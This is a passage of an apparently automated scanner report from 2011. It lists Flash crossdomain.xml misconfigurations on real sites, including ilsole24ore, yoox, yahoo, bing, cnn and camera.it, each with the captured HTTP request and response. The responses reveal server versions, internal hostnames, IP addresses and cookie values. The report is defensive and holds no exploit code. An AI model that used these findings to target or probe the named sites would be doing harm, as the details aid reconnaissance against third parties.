Severity:   High
Confidence:   Certain
Host:   http://paginebianche.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: paginebianche.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:28:05 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375285304156; path=/; expires=Thu, 29-Apr-21 22:28:05 GMT; domain=.ilsole24ore.com
Last-Modified: Wed, 18 Mar 2009 13:14:48 GMT
ETag: "670190-d6-4656477ce8200"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-d
...[SNIP]...

5.18. http://paginegialle.ilsole24ore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://paginegialle.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: paginegialle.ilsole24ore.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Last-Modified: Mon, 03 Jul 2006 07:55:31 GMT
ETag: "a7cb6a-2e8-44a8cd73"
Content-Type: text/xml
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 744
Connection: close
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- dominio AMBIENTE DI SVILUPPO (e-tree rete interna
...[SNIP]...
<allow-access-from domain="seatpg.e-tree.lan" />
...[SNIP]...
<allow-access-from domain="194.185.174.178" />
...[SNIP]...
<allow-access-from domain="stage.paginegialle.it" />
...[SNIP]...
<allow-access-from domain="www.paginegialle.it" />
...[SNIP]...
<allow-access-from domain="212.48.3.200" />
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.19. http://secure-it.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:42 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 22:17:42 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.20. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:943"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:18:46 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.21. http://video.ilsole24ore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:04:50 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:05 GMT
ETag: "278a7e-13b-32a9ec40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.22. http://www.luxury24.ilsole24ore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luxury24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luxury24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:45:41 GMT
Server: Apache/2.0.46 (CentOS)
Last-Modified: Tue, 06 Oct 2009 15:51:22 GMT
ETag: "15aca3e-13b-33ad5280"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.23. http://www.motori24.ilsole24ore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motori24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motori24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:17 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:33 GMT
ETag: "27dc38-13b-34552b40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.24. http://www.yoox.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yoox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yoox.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 03 Nov 2009 15:10:14 GMT
Accept-Ranges: bytes
ETag: "983995be975cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ORIGIN: Web14
Content-Length: 102
Date: Mon, 02 May 2011 22:45:40 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.25. http://zanox01.webtrekk.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://zanox01.webtrekk.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: zanox01.webtrekk.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Content-Length: 106
Date: Mon, 02 May 2011 22:21:14 GMT
Connection: close
Server: q3/4

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.26. http://adimg.alice.it/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adimg.alice.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adimg.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:32 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 10:38:32 GMT
ETag: "59a-49fb0c73dd6d7"
Accept-Ranges: bytes
Content-Length: 1434
P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="hp.rossoalice.it" />
   <allow-access-from domain="hp.rossoalice.alice.it" />
   <allow-access-from domain="speciali.rossoalice.alice.it" />
   <allow-access-from domain="amici.rossoalice.alice.it" />    
   <allow-access-from domain="community.rossoalice.alice.it" />        
   <allow-access-from domain="live.rossoalice.alice.it" />            
   <allow-access-from domain="giochi.rossoalice.alice.it" />            
   <allow-access-from domain="millegiochi.rossoalice.alice.it" />
   <allow-access-from domain="radioalice.rossoalice.alice.it" />    
   <allow-access-from domain="*.rossoalice.alice.it" />
   <allow-access-from domain="*.rossoalice.virgilio.it" />
<allow-access-from domain="*.yalp.alice.it" />
   <allow-access-from domain="*.alicehometv.alice.it" />
   <allow-access-from domain="*.dailymotion.alice.it" />
   <allow-access-from domain="*.alice.pubdev.dailymotion.com" />
   <allow-access-from domain="dailymotion.virgilio.it" />
   <allow-access-from domain="*.virgilio.it" />
   <allow-access-from domain="*.2mdn.net" secure="true"/>
   <allow-access-from domain="*.cubovision.it" secure="true"/>
   <allow-access-from domain="*.flumotion.com" secure="true"/>
...[SNIP]...

5.27. http://adv.ilsole24ore.it/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adv.ilsole24ore.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:14 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Last-Modified: Tue, 11 Jan 2011 17:00:30 GMT
ETag: "118003-132-4d2c8cae"
Accept-Ranges: bytes
Content-Length: 306
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.weebo.it" />
   <allow-access-from domain="*.deabyday.tv" />
...[SNIP]...

5.28. http://answers.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: answers.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.29. http://api.bing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Mon, 02 May 2011 22:23:14 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=9657056B05E34F21B03456DFC654A712; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=EB15584ECD52449D90E326E400B536A2; expires=Wed, 01-May-2013 22:23:14 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.30. http://edition.cnn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edition.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edition.cnn.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:06 GMT
Server: Apache
Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT
Accept-Ranges: bytes
Content-Length: 2326
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 23:23:21 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>        
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*.salon.com"/>    
   <allow-access-from domain="*.secondthought.com"/>    
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.cnnexpansion.com"/>
   <allow-access-from domain="mediacache.travelzoo.com"/>
   <allow-access-from domain="*.cdn.turner.com"/>    
   <allow-access-from domain="staging.barbariangroup.com"/>
   <allow-access-from domain="*.spreadomat.net"/>
   <allow-access-from domain="CNNShirts.spreadshirt.com"/>        
   <allow-access-from domain="72.3.226.28"/>
   <allow-access-from domain="isg-marketing.com"/>
   <allow-access-from domain="*.isg-marketing.com"/>
   <allow-access-from domain="*isgwidgets.s3.amazonaws.com"/>    
   <allow-access-from domain="*.oprah.com"/>
   <allow-access-from domain="zuse.networld.at"/>
   <allow-access-from domain="*.fusebox.com"/>
   <allow-access-from domain="*.cnnpromos.com"/>        
<allow-access-from domain="*.rtm.com"/>
<allow-access-from domain="*.rtmweb.rtm.com"/>    
<allow-access-from domain="*.stamen.com"/>        
<allow-access-from domain="*.prizelogic.com"/>
...[SNIP]...

5.31. http://en.camera.it/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.camera.it

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT
Vary: Accept-Encoding
Content-Length: 1023
Date: Mon, 02 May 2011 23:56:10 GMT
X-Varnish: 1575094938
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.camera.it" />
<allow-access-from domain="www.camera.it" />
<allow-access-from domain="http://leg16.camera.it" />
<allow-access-from domain="*.camera.it" />
<allow-access-from domain="http://nuovo.camera.it" />
<allow-access-from domain="nuovo.camera.it" />
<allow-access-from domain="*.nuovo.camera.it" />
<allow-access-from domain="http://xm.intra.camera.it" />
<allow-access-from domain="*.xm.intra.camera.it" />
<allow-access-from domain="xm.intra.camera.it" />
<allow-access-from domain="http://xmtenderinter.intra.camera.it" />
<allow-access-from domain="*.xmtenderinter.intra.camera.it" />
<allow-access-from domain="xmtenderinter.intra.camera.it" />
<allow-access-from domain="http://nuovo.intra.camera.it" />
<allow-access-from domain="*.nuovo.intra.camera.it" />
<allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.32. http://finanza-mercati.ilsole24ore.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: finanza-mercati.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:26 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Thu, 24 Mar 2011 07:09:47 GMT
Accept-Ranges: bytes
Content-Length: 218
Vary: User-Agent
ETag: "2044e1-da-49f3529aa9469"-gzip
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.ilsole24ore.com"/>
</cros
...[SNIP]...

5.33. http://friendfeed.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 321
Vary: Cookie
Server: FriendFeedServer/0.1
Etag: "d69a789b2865b15041af5e97e97c7b933b34666a"
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: AT=14162173952499924949_1304375087; Domain=.friendfeed.com; Path=/

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.friendfeed.com"/>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...

5.34. http://giochi-tiscali.king.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://giochi-tiscali.king.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: giochi-tiscali.king.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:25:27 GMT
Server: Apache
Expires: Mon, 02 May 2011 22:35:27 GMT
Content-Length: 2487
Content-Type: text/xml; charset=iso-8859-1
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.king.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="217.212.243.23" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="giochi.corrieredellosport.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="giochi.gossipnews.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="it.king.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.it.msn.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="iti1.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="kingit.pantherssl.com" secure="false" to-ports="*" />
...[SNIP]...

5.35. http://it.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.yahoo.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 22:25:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: application/xml
Age: 0
Server: YTS/1.20.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.36. http://itunes.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce5473e53a"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=454
Date: Mon, 02 May 2011 22:25:41 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

5.37. http://nuovo.camera.it/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nuovo.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nuovo.camera.it

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT
Vary: Accept-Encoding
Content-Length: 1023
Date: Mon, 02 May 2011 22:26:32 GMT
X-Varnish: 132687829
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb05
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.camera.it" />
<allow-access-from domain="www.camera.it" />
<allow-access-from domain="http://leg16.camera.it" />
<allow-access-from domain="*.camera.it" />
<allow-access-from domain="http://nuovo.camera.it" />
...[SNIP]...
<allow-access-from domain="*.nuovo.camera.it" />
<allow-access-from domain="http://xm.intra.camera.it" />
<allow-access-from domain="*.xm.intra.camera.it" />
<allow-access-from domain="xm.intra.camera.it" />
